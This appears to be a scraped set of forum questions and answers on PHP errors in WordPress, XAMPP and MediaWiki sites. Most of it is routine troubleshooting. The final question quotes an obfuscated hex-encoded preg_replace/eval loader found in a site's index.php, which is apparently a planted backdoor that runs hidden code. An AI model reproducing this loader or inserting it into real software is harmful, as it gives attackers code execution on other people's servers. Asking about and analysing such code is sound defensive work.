today after updating a piece of content on my WP website I've got this error showing up (instead of some icons images):
Warning: file_get_contents(http://example.com/wp-content/uploads/2020/03/icon-linkedin.svg): failed to open stream: Connection refused in /home/user/mywebsite/htdocs/wp-content/themes/theabnet/front-page.php on line 28
This is the screenshot of the code generating the error:
https://i.stack.imgur.com/Al7A6.png
The weird thing is that this never happened before and the edit I made was not involving icons or things directly connected with that navigation area.
Any help? (No strong coding skills unfortunately).
Any help? (No strong coding skills unfortunately).
Revert the changes and see if your website recovers.
You can try giving folder permission in your live server sometimes permission. If it is your own, try to re-register the domain (or) change the SVG icon link.
I think the domain name (mywebsite.com) of your requested SVG link is wrong. If it is your own, try to re-register domain (or) change SVG icon link.
Related
This is my first post here. I followed instructions and explored all the internet on this topic, still didn't figure out the solution. Added interpreter as you can see on this screenshot:
I created PHP Web Application as visible here:
And after that I when I try to run it in any browser I get this message (Don't have reputation 10 so couldn't post it as 3rd picture):
"Object not found!
The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again.
If you think this is a server error, please contact the webmaster.
Error 404
localhost Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.20"
Please help me, I don't know what to do anymore. Thanks in advance!
EDIT 1:
So I figured out that my php file and all the other files (css, js, html, img) have to be in xamp/htdocs folder so I can run it manually by writing "localhost/filename.php" in address bar. It works only if my php file is exactly in htdocs folder. Otherwise when I try to run my file from folder where the rest of my project is and in address I add "localhost/projectfolder/homepage.php" I got message saying: "
Warning: Unknown: failed to open stream: No such file or directory in
Unknown on line 0
Fatal error: Unknown: Failed opening required 'D:/xampp/htdocs/Damir
Jelusić/homepage.php' (include_path='D:\xampp\php\PEAR') in Unknown on
line 0"
I couldn't find a solution to this. Also I would like to be able to run my php page just by clickin little chrome icon in phpstorm. Tell me if it is possible. Cheers!
I have a friend who has a problem on his website under wordpress.
Wordpress did an update 10 hours ago and since, we cannot enter the website.
We aren't developpers and we don't know anything about it, and we don't know how to fix this easily. Can someone help us please ?
(Sorry for the bad english as I'm french)
When I try to get on the website, it show this :
Fatal error: require(): Failed opening required
'/home/u438775107/public_html/wp-includes/class-wp-list-util.php'
(include_path='.:/opt/php-5.5/pear') in
/home/u438775107/public_html/wp-settings.php on line 97
Try to following steps
1)Remove the Error plugin Directory
like:- c://wamp/www/wordpress/wp-content/plugins/revslider
2)Upload this backup plugin and active plugin
3)Then after solve this type of errors.
You are getting this error because the WordPress was not updated Successfully.
Try the following to fix it:
1!) Re-install WordPress Manually.
Take a backup of wp-content (from the file manager) and your database (from phpmyadmin or console if you don't have a GUI), just reinstall the core files.
2) Check homeurl and siteurl form phpmyadmin (should be in the wp_options table)
3) rename .htaccess file form root so that it is disabled untill we get the issues fixed.
5) Always user private browser to remove cache and check if the issue was solved.
It should work fine now.
I've updated my mediawiki from 1.26.2 to 1.27, the installation process finished ok, but when I try to access I received this error:
Warning:
require(/var/app/current/includes/specials/SpecialUserLogin.php):
failed to open stream: No such file or directory in
/var/app/current/includes/AutoLoader.php on line 81 Fatal error:
require(): Failed opening required
'/var/app/current/includes/specials/SpecialUserLogin.php'
(include_path='/var/app/current/vendor/pear/pear_exception:/var/app/current/vendor/pear/console_getopt:/var/app/current/vendor/pear/pear-core-minimal/src:/var/app/current/vendor/pear/mail_mime:/var/app/current/vendor/pear/mail_mime-decode:/var/app/current/vendor/pear/net_socket:/var/app/current/vendor/pear/net_smtp:/var/app/current/vendor/pear/mail:.:/usr/share/pear:/usr/share/php')
in /var/app/current/includes/AutoLoader.php on line 81
I have no idea why is this happening. If I check the files in my server they're there. I'm also having template issues if I choose vector I only get a messed up template, without styling.
I'm using PHP 5.6.
I hope someone can help me.
I just stumbled across this same exact error after upgrading to MW 1.27.
In my case, the SpecialUserlogin.php existed and all of the permissions were right BUT the word login was written in lowercase so the system thought this file didn't exist. So I just renamed the SpecialUserlogin.php to SpecialUserLogin.php and b00m, it worked!
As for your templating issues, check the common.css file. Copy paste everything out of there, so it's empty, if you don't use it. And check that you're calling your style files correctly in your template.
I have not take care of my site for couple months. Recently, I want to update my Wordpress and Themes. However, when I try to login www.beatyourbuy.com/wp-admin. It give me below message. First of all, I am not a IT expert, have limited knowledge of IT. Would really appreciate someone can help me about this.
The error message show as below (forgive my poor English):
Warning: include(/home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/includes/classes/main.php): failed to open stream: No such file or directory in /home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/woocommerce-checkout-manager.php on line 15
Warning: include(): Failed opening '/home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/includes/templates/functions/required/shipping_required.php' for inclusion (include_path='.:/opt/alt/php55/usr/share/pear:/opt/alt/php55/usr/share/php') in /home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/woocommerce-checkout-manager.php on line 27
Warning: include(/home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/includes/templates/functions/woocm_editing_wrapper.php): failed to open stream: No such file or directory in /home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/woocommerce-checkout-manager.php on line 28
There are more when you go to main page on www.beatyourbuy.com:
Fatal error: Call to undefined function wccs_positioning() in /home/fredyu/public_html/wp-content/plugins/woocommerce-checkout-manager/woocommerce-checkout-manager.php on line 75
It appears that the WordPress update has caused a problem with the Woocommerce Checkout Manager plugin.
To correct this, you must disable the offending plugin woocommerce-checkout-manager.
This will require you to have FTP access to your site. Once login via FTP , browse to the plugin directory wp-content/plugins/ and rename the folder woocommerce-checkout-manager to woocommerce-checkout-manager-disable.
You should now be able to log into the WordPress admin page and the Woocommerce Checkout Manager plugin will be deactivated.
Going only with what you have written, as a general rule it is advisable to update all plugins prior to a WordPress core update.
I was randomly browsing a site on one of our servers, and I found this bit of code as the second line on index.php:
#preg_replace("\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145","\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73","\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63");
When I run it, I get:
Warning: file(/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57): failed to open stream: No such file or directory
It looks like it's obfuscated to do something that it really shouldn't be doing. Can anyone explain to me how I can figure out what the intention was of this line of code? And whether or not my server was actually hacked?
What was the perpetrator trying to do? It is a site running NOAH CLASSIFIEDS script.
that is an hexa-coded text if you want to see the decoded version then see this
Decoded